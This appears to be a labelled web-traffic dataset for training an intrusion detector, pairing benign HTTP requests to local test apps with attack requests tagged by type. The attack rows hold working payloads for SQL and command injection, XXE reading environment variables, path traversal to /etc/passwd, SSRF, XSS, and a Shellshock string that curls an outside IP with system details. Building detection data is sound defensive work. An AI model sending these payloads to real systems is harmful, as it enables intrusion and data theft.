GET /rest/products/search?q=ORDER%20BY%20SLEEP%285%29-- HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL
anomalous
SQL Injection
GET /api/products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
GET /search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
POST /DVWA/vulnerabilities/exec/ HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=ijck02bs4j60p2couoqs7mmq87; security=low Content-Length: 43 ip=; perl -e 'print "X"x4096'&Submit=Submit
anomalous
Command Injection
POST /rest/user/whoami HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: HTML Cookie: <BIG>YOUR SITE HAS BEEN COMPROMISED Content-Length: 0
anomalous
HTML Injection
GET /rest/memories HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SSRF Referer: file://2130706433:8080/
anomalous
Server-Side Request Forgery
GET /vulnerabilities/exec/ HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND X-Command: <!--#exec cmd="/usr/bin/id;--> Cookie: security=low; PHPSESSID=ijck02bs4j60p2couoqs7mmq87; security=low
anomalous
Command Injection
GET /account HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: <?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "/proc/self/environ">]><root>&xxe;</root> Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: XXE
anomalous
XML External Entity
POST /api/system/exec HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND Content-Type: application/json Cookie: PHPSESSID=ijck02bs4j60p2couoqs7mmq87; security=low Content-Length: 24 {"command": "| sleep 5"}
anomalous
Command Injection
POST /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
GET /products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
GET /api/products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: jaVasCript:alert(document.domain) Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: XSS
anomalous
Cross-Site Scripting
POST /products?page=mango HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/search
normal
Normal
GET /api/products?id=%3B HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL
anomalous
SQL Injection
GET /DVWA/vulnerabilities/exec/?ip=%28%29%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Fbash%20-c%20%22curl%20http%3A%2F%2F135.23.158.130%2F.testing%2Fshellshock.txt%3Fvuln%3D22%3Funame%3D%5C%60uname%20-a%5C%60%22&Submit=Submit HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND Cookie: PHPSESSID=ijck02bs4j60p2couoqs7mmq87; security=low
anomalous
Command Injection
GET /search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
GET /api/SecurityQuestions HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SSRF X-Custom-Header: https://[::1]:80
anomalous
Server-Side Request Forgery
GET /api/Challenges?q=mango HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
POST /rest/user/login HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL Content-Type: application/x-www-form-urlencoded Content-Length: 136 email=ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27&password=test123
anomalous
SQL Injection
GET /api/products?search=banana HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
POST /rest/products/search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL Content-Type: application/json Content-Length: 12 {"q": ""^""}
anomalous
SQL Injection
GET /api/Quantitys HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: LFI Referer: ........................................................................../../../../../../../..//etc/passwd
anomalous
Local File Inclusion
GET /rest/products/search?page=drink HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/search
normal
Normal
POST /api/products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: LFI Cookie: %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd Content-Length: 0
anomalous
Local File Inclusion
End of preview. Expand in Data Studio
README.md exists but content is empty.
Downloads last month
2